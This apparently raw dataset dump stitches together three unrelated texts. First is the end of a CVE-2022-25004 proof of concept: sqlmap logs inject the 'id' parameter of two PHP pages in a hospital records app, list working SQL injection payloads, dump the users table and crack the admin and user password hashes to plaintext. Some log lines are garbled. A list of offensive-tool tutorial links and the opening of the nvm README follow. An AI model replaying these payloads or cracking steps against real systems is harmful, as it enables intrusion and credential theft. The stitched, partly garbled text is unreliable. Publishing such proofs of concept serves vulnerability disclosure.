hash method 'md5_generic_passwd'\nwhat dictionary do you want to use?\n[1] default dictionary file 'C:\\Users\\venvaropt\\Desktop\\CVE\\sqlmap\\data\\txt\\wordlist.tx_' (press Enter)\n[2] custom dictionary file\n[3] file with list of dictionary files\n> Y\n[12:04:21] [INFO] using default dictionary\ndo you want to use common password suffixes? (slow!) [y/N] N\n[12:04:21] [INFO] starting dictionary-based cracking (md5_generic_passwd)\n[12:04:21] [INFO] starting 4 processes\n[12:04:35cblake12:04:35't status: 09100... |INFO] cracked password 'stupid123\n] [] [INFOINFO] current status: 09101... /] cracked password 'admin123' for user 'admin'\nDatabase: hprms_db\nTable: users\n[2 entries]\n+----------+----------------------------------------------+\n| username | password |\n+----------+----------------------------------------------+\n| admin | 0192023a7bbd73250516f069df18b500 (admin123) |\n| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |\n+----------+----------------------------------------------+\n\n[12:05:01] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost\\dump\\hprms_db\\users.csv'\n[12:05:01] [INFO] fetched data logged to text files under 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost'\n\n[*] ending @ 12:05:01 /2022-03-01/\n\nSQL - Injecting for parameter 'id' in manage_admission.php app\n\n ,d d ,d d8\n888-~88e 888 888 ,d888 ,d888 d88~\\ e88~~8e e88~~\\ 888 888 888-~\\ ,d888 _d88__ Y88b /\n888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/\n888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/\n888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y\n888 888 \"88_-888 888 888 \\_88P \"88___/ \"88__/ \"88_-888 888 888 \"88_/ /\n _/\n {1.6.1.2#dev}\n https://sqlmap.org\n https://www.nu11secur1ty.com/\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 12:05:09 /2022-03-01/\n\n[12:05:09] [INFO] testing connection to the target URL\nyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=20uv7un8gs4...8s8qj5kopv'). Do you want to use those [Y/n] Y\n[12:05:09] [INFO] checking if the target is protected by some kind of WAF/IPS\n[12:05:09] [INFO] testing if the target URL content is stable\n[12:05:10] [INFO] target URL content is stable\n[12:05:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')\n[12:05:10] [INFO] testing for SQL injection on GET parameter 'id'\nfor the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y\n[12:05:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\n[12:05:10] [WARNING] reflective value(s) found and filtering out\n[12:05:10] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'\n[12:05:10] [INFO] testing 'Generic inline queries'\n[12:05:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'\n[12:05:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'\n[12:05:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'\n[12:05:15] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'\n[12:05:16] [INFO] GET parameter 'id' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --not-string=\"Fatal\")\n[12:05:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'\n[12:05:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'\n[12:05:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'\n[12:05:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'\n[12:05:16] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'\n[12:05:16] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'\n[12:05:16] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'\n[12:05:16] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'\n[12:05:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'\n[12:05:16] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'\n[12:05:16] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable\n[12:05:16] [INFO] testing 'MySQL inline queries'\n[12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'\n[12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries'\n[12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'\n[12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'\n[12:05:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'\n[12:05:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'\n[12:05:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'\n[12:05:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable\n[12:05:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'\n[12:05:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'\n[12:05:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found\n[12:05:30] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test\n[12:05:31] [INFO] target URL appears to have 8 columns in query\n[12:05:31] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable\nGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N\nsqlmap identified the following injection point(s) with a total of 204 HTTP(s) requests:\n---\nParameter: id (GET)\n Type: boolean-based blind\n Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause\n Payload: id=1' RLIKE (SELECT (CASE WHEN (1299=1299) THEN 1 ELSE 0x28 END))-- QynS\n\n Type: error-based\n Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\n Payload: id=1' OR (SELECT 7634 FROM(SELECT COUNT(*),CONCAT(0x716b7a6b71,(SELECT (ELT(7634=7634,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vmRW\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: id=1' AND (SELECT 8229 FROM (SELECT(SLEEP(3)))Qpzi)-- hEWR\n\n Type: UNION query\n Title: MySQL UNION query (NULL) - 8 columns\n Payload: id=1' UNION ALL SELECT CONCAT(0x716b7a6b71,0x446147684b447641734a4e63496e494a4b67784956554b4952515543684251577076656f42487754,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL#\n---\n[12:05:31] [INFO] the back-end DBMS is MySQL\nweb application technology: PHP 8.1.2, PHP, Apache 2.4.52\nback-end DBMS: MySQL >= 5.0 (MariaDB fork)\n[12:05:31] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'\n[12:05:31] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'\n[12:05:31] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'\n[12:05:31] [INFO] recognized possible password hashes in column 'password'\ndo you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N\ndo you want to crack them via a dictionary-based attack? [Y/n/q] Y\n[12:05:31] [INFO] using hash method 'md5_generic_passwd'\nwhat dictionary do you want to use?\n[1] default dictionary file 'C:\\Users\\venvaropt\\Desktop\\CVE\\sqlmap\\data\\txt\\wordlist.tx_' (press Enter)\n[2] custom dictionary file\n[3] file with list of dictionary files\n> Y\n[12:05:31] [INFO] using default dictionary\ndo you want to use common password suffixes? (slow!) [y/N] N\n[12:05:31] [INFO] starting dictionary-based cracking (md5_generic_passwd)\n[12:05:31] [INFO] starting 4 processes\n[12:05:37] [INFO] cracked password 'admin123' for user 'admin'\n[] [12:05:48INFO] [] current status: Upgra... |INFO] cracked password 'stupid123' for user 'cblake'\nDatabase: hprms_db\nTable: users\n[2 entries]\n+----------+----------------------------------------------+\n| username | password |\n+----------+----------------------------------------------+\n| admin | 0192023a7bbd73250516f069df18b500 (admin123) |\n| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |\n+----------+----------------------------------------------+\n\n[12:06:08] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost\\dump\\hprms_db\\users.csv'\n[12:06:08] [INFO] fetched data logged to text files under 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost'\n\n[*] ending @ 12:06:08 /2022-03-01/\n\nSQL - Injecting for parameter 'id' in manage_room_type.php app\n\n ,d d ,d d8\n888-~88e 888 888 ,d888 ,d888 d88~\\ e88~~8e e88~~\\ 888 888 888-~\\ ,d888 _d88__ Y88b /\n888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/\n888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/\n888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y\n888 888 \"88_-888 888 888 \\_88P \"88___/ \"88__/ \"88_-888 888 888 \"88_/ /\n _/\n {1.6.1.2#dev}\n https://sqlmap.org\n https://www.nu11secur1ty.com/\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 12:06:15 /2022-03-01/\n\n[12:06:15] [INFO] testing connection to the target URL\nyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=5u1m2tvs8rd...mm5ijndlgg'). Do you want to use those [Y/n] Y\n[12:06:15] [INFO] checking if the target is protected by some kind of WAF/IPS\n[12:06:15] [INFO] testing if the target URL content is stable\n[12:06:16] [INFO] target URL content is stable\n[12:06:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')\n[12:06:16] [INFO] testing for SQL injection on GET parameter 'id'\nfor the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y\n[12:06:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\n[12:06:16] [WARNING] reflective value(s) found and filtering out\n[12:06:16] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string=\"Private Room with Single Patient Bed.\")\n[12:06:16] [INFO] testing 'Generic inline queries'\n[12:06:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'\n[12:06:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'\n[12:06:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'\n[12:06:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'\n[12:06:16] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'\n[12:06:16] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'\n[12:06:16] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'\n[12:06:16] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'\n[12:06:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'\n[12:06:17] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable\n[12:06:17] [INFO] testing 'MySQL inline queries'\n[12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'\n[12:06:17] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)\n[12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries'\n[12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'\n[12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'\n[12:06:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'\n[12:06:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'\n[12:06:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'\n[12:06:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable\n[12:06:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'\n[12:06:23] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found\n[12:06:23] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test\n[12:06:23] [INFO] target URL appears to have 6 columns in query\n[12:06:24] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable\nGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N\nsqlmap identified the following injection point(s) with a total of 57 HTTP(s) requests:\n---\nParameter: id (GET)\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=1' AND 4275=4275 AND 'Pbap'='Pbap\n\n Type: error-based\n Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\n Payload: id=1' AND (SELECT 7905 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(7905=7905,1))),0x716b717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'AwDy'='AwDy\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: id=1' AND (SELECT 1604 FROM (SELECT(SLEEP(3)))MPcP) AND 'bAKs'='bAKs\n\n Type: UNION query\n Title: Generic UNION query (NULL) - 6 columns\n Payload: id=-6478' UNION ALL SELECT CONCAT(0x71626a6b71,0x616d625874694476617a78684a536b747145584d54786b47637545457570594e6e5766734f587249,0x716b717171),NULL,NULL,NULL,NULL,NULL-- -\n---\n[12:06:24] [INFO] the back-end DBMS is MySQL\nweb application technology: Apache 2.4.52, PHP, PHP 8.1.2\nback-end DBMS: MySQL >= 5.0 (MariaDB fork)\n[12:06:24] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'\n[12:06:24] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'\n[12:06:24] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'\n[12:06:24] [INFO] recognized possible password hashes in column 'password'\ndo you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N\ndo you want to crack them via a dictionary-based attack? [Y/n/q] Y\n[12:06:24] [INFO] using hash method 'md5_generic_passwd'\nwhat dictionary do you want to use?\n[1] default dictionary file 'C:\\Users\\venvaropt\\Desktop\\CVE\\sqlmap\\data\\txt\\wordlist.tx_' (press Enter)\n[2] custom dictionary file\n[3] file with list of dictionary files\n> Y\n[12:06:24] [INFO] using default dictionary\ndo you want to use common password suffixes? (slow!) [y/N] N\n[12:06:24] [INFO] starting dictionary-based cracking (md5_generic_passwd)\n[12:06:24] [INFO] starting 4 processes\n[] cracked password '12:06:30admin123] [' for user 'INFO] current status: 1teli... |admin'\n[cblake12:06:40's: a9243... /12:06:40] [INFO] cracked password 'stupid123' for user '\nDatabase: hprms_db\nTable: users\n[2 entries]\n+----------+----------------------------------------------+\n| username | password |\n+----------+----------------------------------------------+\n| admin | 0192023a7bbd73250516f069df18b500 (admin123) |\n| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |\n+----------+----------------------------------------------+\n\n[12:07:03] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost\\dump\\hprms_db\\users.csv'\n[12:07:03] [INFO] fetched data logged to text files under 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost'\n\n[*] ending @ 12:07:03 /2022-03-01/\n\nHappy hunting with nu11secur1ty =)\n\n```\n\n\n## Reproduce:\n[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-25004)\n\n## More info:\n[href](https://www.nu11secur1ty.com/2022/03/cve-2022-25004.html)\n"}}},{"rowIdx":547,"cells":{"text":{"kind":"string","value":"# How-to Tutorials \n\n### Back [⤴](https://github.com/scsp-community/Cyber-Sec-Resources)\n\n* [Buffer Overflow](https://www.youtube.com/watch?v=1dL0U2OhvH0&list=PL7yUP1guJz7c6-A-fGo8-CXeAtCWNcj3m)\n* [Kali Tools - Sublist3r](https://www.youtube.com/watch?v=ePZvh60zuWw)\n* [Kali Tools - EyeWitness](https://www.youtube.com/watch?v=x6gRIKlmPto&feature=youtu.be)\n* [Kali Tools - SQLMap](https://www.youtube.com/watch?v=AznTganeebU)\n* [Kali Tools - GoBuster](https://www.youtube.com/watch?v=wlhuAmN_HQg)\n* [Kali Tools - JoomScan](https://www.youtube.com/watch?v=cT4dMwuk7Gs)\n* [Kali Tools - HTTPProbe](https://www.youtube.com/watch?v=nQs5Bw7ErcU)\n* [Kali Tools - Nikto](https://www.youtube.com/watch?v=-H17ZqCZcAU)\n* [Kali Tools - CherryTree](https://youtu.be/vlmlb2kqbfo)\n* [Kali Tools - Davtest](https://www.youtube.com/watch?v=fyubocGC8iY)\n* [Kali Tools - DNSEnum](https://youtu.be/aoCHj0Eh5JA)\n* [Kali Tools - Searchsploit and ExploitDB](https://www.youtube.com/watch?v=xxbsZVoTpGs)\n* [Kali Tools - Enum4Linux](https://www.youtube.com/watch?v=1rxggQlPCBo&t=7s)\n* [Kali Tools - Apache Users](https://www.youtube.com/watch?v=RxIfopiayQU&list=PL7yUP1guJz7f-vpZYch_TDLRX_C_sei6Y&index=5&t=0s)\n* [Kali Tools - URL Crazy ](https://www.youtube.com/watch?v=fxCgBHaO6Yg&list=PL7yUP1guJz7f-vpZYch_TDLRX_C_sei6Y&index=6&t=0s)\n* [Kali Tools - Crunch ](https://www.youtube.com/watch?v=eYxbJOHgshE&list=PL7yUP1guJz7f-vpZYch_TDLRX_C_sei6Y&index=4&t=0s)\n* [Kali Tools - SSLstrip](https://www.youtube.com/watch?v=D3NemrhZQSc&list=PL7yUP1guJz7f-vpZYch_TDLRX_C_sei6Y&index=2&t=0s)\n* [Kali Tools - SSLyze](https://www.youtube.com/watch?v=DvwHOIkzBiI&list=PL7yUP1guJz7f-vpZYch_TDLRX_C_sei6Y&index=3&t=0s)\n* [OSINT Tools - Buster](https://www.youtube.com/watch?v=KXU1674j7fo&list=PL7yUP1guJz7fZNfZM-zkUieKSeA1TCG2S&index=2&t=0s)\n* [OSINT Tools - Danger Zone](https://www.youtube.com/watch?v=-ATtptQLzRU&list=PL7yUP1guJz7fZNfZM-zkUieKSeA1TCG2S&index=3&t=0s)\n* [OSINT Tools - R3con1z3r](https://www.youtube.com/watch?v=Jg3yibNeYcQ&list=PL7yUP1guJz7fZNfZM-zkUieKSeA1TCG2S&index=4&t=0s)\n* [OSINT Tools - Shodan](https://www.youtube.com/watch?v=9A77BUaHXmY&list=PL7yUP1guJz7fZNfZM-zkUieKSeA1TCG2S&index=5&t=0s)\n* [OSINT Tools - theHarvester](https://www.youtube.com/watch?v=kNA8Z4fDJbI&list=PL7yUP1guJz7fZNfZM-zkUieKSeA1TCG2S&index=6&t=0s)\n* [OSINT Tools - TinEye](https://www.youtube.com/watch?v=QfQvPE22p0U&list=PL7yUP1guJz7fZNfZM-zkUieKSeA1TCG2S&index=7&t=0s)\n* [OSINT Tools - SpiderFoot](https://www.youtube.com/watch?v=NE9jrv59HQg&list=PL7yUP1guJz7fZNfZM-zkUieKSeA1TCG2S&index=8&t=0s)\n* [OSINT Tools - Metagoofil](https://www.youtube.com/watch?v=tnWYZns2OZI&list=PL7yUP1guJz7fZNfZM-zkUieKSeA1TCG2S&index=9&t=0s)\n"}}},{"rowIdx":548,"cells":{"text":{"kind":"string","value":"# Node Version Manager [![Build Status](https://travis-ci.org/creationix/nvm.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.34.0-yellow.svg)][4] [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/684/badge)](https://bestpractices.coreinfrastructure.org/projects/684)\n\n\n\n## Table of Contents\n\n- [Installation and Update](#installation-and-update)\n - [Install & Update script](#install--update-script)\n - [Ansible](#ansible)\n - [Verify installation](#verify-installation)\n - [Important Notes](#important-notes)\n - [Git install](#git-install)\n - [Manual Install](#manual-install)\n - [Manual upgrade](#manual-upgrade)\n- [Usage](#usage)\n - [Long-term support](#long-term-support)\n - [Migrating global packages while installing](#migrating-global-packages-while-installing)\n - [Default global packages from file while installing](#default-global-packages-from-file-while-installing)\n - [io.js](#iojs)\n - [System version of node](#system-version-of-node)\n - [Listing versions](#listing-versions)\n - [Suppressing colorized output](#suppressing-colorized-output)\n - [.nvmrc](#nvmrc)\n - [Deeper Shell Integration](#deeper-shell-integration)\n - [bash](#bash)\n - [Automatically call `nvm use`](#automatically-call-nvm-use)\n - [zsh](#zsh)\n - [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file)\n- [License](#license)\n- [Running tests](#running-tests)\n- [Bash completion](#bash-completion)\n - [Usage](#usage-1)\n- [Compatibility Issues](#compatibility-issues)\n- [Installing nvm on Alpine Linux](#installing-nvm-on-alpine-linux)\n- [Removal](#removal)\n - [Manual Uninstall](#manual-uninstall)\n- [Docker for development environment](#docker-for-development-environment)\n- [Problems](#problems)\n- [Mac OS \"troubleshooting\"](#mac-os-troubleshooting)\n\n\n\n## Installation and Update\n\n### Install & Update script\n\nTo **install** or **update** nvm, you can use the [install script][2] using cURL:\n\n```sh\ncurl -o- https://raw.githubusercontent.com/creationix/nvm/v0.34.0/install.sh | bash\n```\n\nor Wget:\n\n```sh\nwget -qO- https://raw.githubusercontent.com/creationix/nvm/v0.34.0/install.sh | bash\n```\n\nThe script clones the nvm repository to `~/.nvm` and adds the source line to your profile (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`).\n\n**Note:** If the environment variable `$XDG_CONFIG_HOME` is present, it will place the `nvm` files there.\n\n```sh\nexport NVM_DIR=\"${XDG_CONFIG_HOME/:-$HOME/.}nvm\"\n[ -s \"$NVM_DIR/nvm.sh\" ] && \\. \"$NVM_DIR/nvm.sh\" # This loads nvm\n```\n\n**Note:** You can add `--no-use` to the end of the above script (...`nvm.sh --no-use`) to postpone using `nvm` until you manually [`use`](#usage) it.\n\nYou can customize the install source, directory, profile, and version using the `NVM_SOURCE`, `NVM_DIR`, `PROFILE`, and `NODE_VERSION` variables.\nEg: `curl ... | NVM_DIR=\"path/to/nvm\"`. Ensure that the `NVM_DIR` does not contain a trailing slash.\n\n*NB. The installer can use `git`, `curl`, or `wget` to download `nvm`, whatever is available.*\n\n**Note:** On Linux, after running the install script, if you get `nvm: command not found` or see no feedback from your terminal after you type:\n\n```sh\ncommand -v nvm\n```\n\nsimply close your current terminal, open a new terminal, and try verifying again.\n\n**Note:** Since OS X 10.9, `/usr/bin/git` has been preset by Xcode command line tools, which means we can't properly detect if Git is installed or not. You need to manually install the Xcode command line tools before running the install script, otherwise, it'll fail. (see [#1782](https://github.com/creationix/nvm/issues/1782))\n\n**Note:** On OS X, if you get `nvm: command not found` after running the install script, one of the following might be the reason:-\n\n - your system may not have a [`.bash_profile file`] where the command is set up. Simply create one with `touch ~/.bash_profile` and run the install script again\n - you might need to restart your terminal instance. Try opening a new tab/window in your terminal and retry.\n\nIf the above doesn't fix the problem, open your `.bash_profile` and add the following line of code:\n\n`source ~/.bashrc`\n\n- For more information about this issue and possible workarounds, please [refer here](https://github.com/creationix/nvm/issues/576)\n\n#### Ansible\n You can use a task:\n\n```\n- name: nvm\n shell: >\n curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.34.0/install.sh | bash\n args:\n creates: \"{{ ansible_env.HOME }}/.nvm/nvm.sh\"\n```\n\n### Verify installation\n\nTo verify that nvm has been installed, do:\n\n```sh\ncommand -v nvm\n```\n\nwhich should output 'nvm' if the installation was successful. Please note that `which nvm` will not work, since `nvm` is a sourced shell function, not an executable binary.\n\n### Important Notes\n\nIf you're running a system without prepackaged binary available, which means you're going to install nodejs or io.js from its source code, you need to make sure your system has a C++ compiler. For OS X, Xcode will work, for Debian/Ubuntu based GNU/Linux, the `build-essential` and `libssl-dev` packages work.\n\n**Note:** `nvm` does not support Windows (see [#284](https://github.com/creationix/nvm/issues/284)). Two alternatives exist, which are neither supported nor developed by us:\n\n - [nvm-windows](https://github.com/coreybutler/nvm-windows)\n - [nodist](https://github.com/marcelklehr/nodist)\n\n**Note:** `nvm` does not support [Fish] either (see [#303](https://github.com/creationix/nvm/issues/303)). Alternatives exist, which are neither supported nor developed by us:\n\n - [bass](https://github.com/edc/bass) allows you to use utilities written for Bash in fish shell\n - [fast-nvm-fish](https://github.com/brigand/fast-nvm-fish) only works with version numbers (not aliases) but doesn't significantly slow your shell startup\n - [plugin-nvm](https://github.com/derekstavis/plugin-nvm) plugin for [Oh My Fish](https://github.com/oh-my-fish/oh-my-fish), which makes nvm and its completions available in fish shell\n - [fnm](https://github.com/fisherman/fnm) - [fisherman](https://github.com/fisherman/fisherman)-based version manager for fish\n - [fish-nvm](https://github.com/FabioAntunes/fish-nvm) - Wrapper around nvm for fish, delays sourcing nvm until it's actually used.\n\n**Note:** We still have some problems with FreeBSD, because there is no official pre-built binary for FreeBSD, and building from source may need [patches](https://www.freshports.org/www/node/files/patch-deps_v8_src_base_platform_platform-posix.cc); see the issue ticket:\n\n - [[#900] [Bug] nodejs on FreeBSD may need to be patched](https://github.com/creationix/nvm/issues/900)\n - [nodejs/node#3716](https://github.com/nodejs/node/issues/3716)\n\n**Note:** On OS X, if you do not have Xcode installed and you do not wish to download the ~4.3GB file, you can install the `Command Line Tools`. You can check out this blog post on how to just that:\n\n - [How to Install Command Line Tools in OS X Mavericks & Yosemite (Without Xcode)](http://osxdaily.com/2014/02/12/install-command-line-tools-mac-os-x/)\n\n**Note:** On OS X, if you have/had a \"system\" node installed and want to install modules globally, keep in mind that:\n\n - When using nvm you do not need `sudo` to globally install a module with `npm -g`, so instead of doing `sudo npm install -g grunt`, do instead `npm install -g grunt`\n - If you have an `~/.npmrc` file, make sure it does not contain any `prefix` settings (which is not compatible with nvm)\n - You can (but should not?) keep your previous \"system\" node install, but nvm will only be available to your user account (the one used to install nvm). This might cause version mismatches, as other users will be using `/usr/local/lib/node_modules/*` VS your user account using `~/.nvm/versions/node/vX.X.X/lib/node_modules/*`\n\nHomebrew installation is not supported. If you have issues with homebrew-installed `nvm`, please `brew uninstall` it, and install it using the instructions below, before filing an issue.\n\n**Note:** If you're using `zsh` you can easily install `nvm` as a zsh plugin. Install [`zsh-nvm`](https://github.com/lukechilds/zsh-nvm) and run `nvm upgrade` to upgrade.\n\n**Note:** Git versions before v1.7 may face a problem of cloning nvm source from GitHub via https protocol, and there is also different behavior of git before v1.6, and git prior to [v1.17.10](https://github.com/git/git/commit/5a7d5b683f869d3e3884a89775241afa515da9e7) can not clone tags, so the minimum required git version is v1.7.10. If you are interested in the problem we mentioned here, please refer to GitHub's [HTTPS cloning errors](https://help.github.com/articles/https-cloning-errors/) article.\n\n### Git install\n\nIf you have `git` installed (requires git v1.7.10+):\n\n1. clone this repo in the root of your user profile\n - `cd ~/` from anywhere then `git clone https://github.com/creationix/nvm.git .nvm`\n1. `cd ~/.nvm` and check out the latest version with `git checkout v0.34.0`\n1. activate nvm by sourcing it from your shell: `. nvm.sh`\n\nNow add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login:\n(you may have to add to more than one of the above files)\n\n```sh\nexport NVM_DIR=\"$HOME/.nvm\"\n[ -s \"$NVM_DIR/nvm.sh\" ] && \\. \"$NVM_DIR/nvm.sh\" # This loads nvm\n[ -s \"$NVM_DIR/bash_completion\" ] && \\. \"$NVM_DIR/bash_completion\" # This loads nvm bash_completion\n```\n\n### Manual Install\n\nFor a fully manual install, execute the following lines to first clone the nvm repository into `$HOME/.nvm`, and then load nvm:\n\n```sh\nexport NVM_DIR=\"$HOME/.nvm\" && (\n git clone https://github.com/creationix/nvm.git \"$NVM_DIR\"\n cd \"$NVM_DIR\"\n git checkout `git describe --abbrev=0 --tags --match \"v[0-9]*\" $(git rev-list --tags --max-count=1)`\n) && 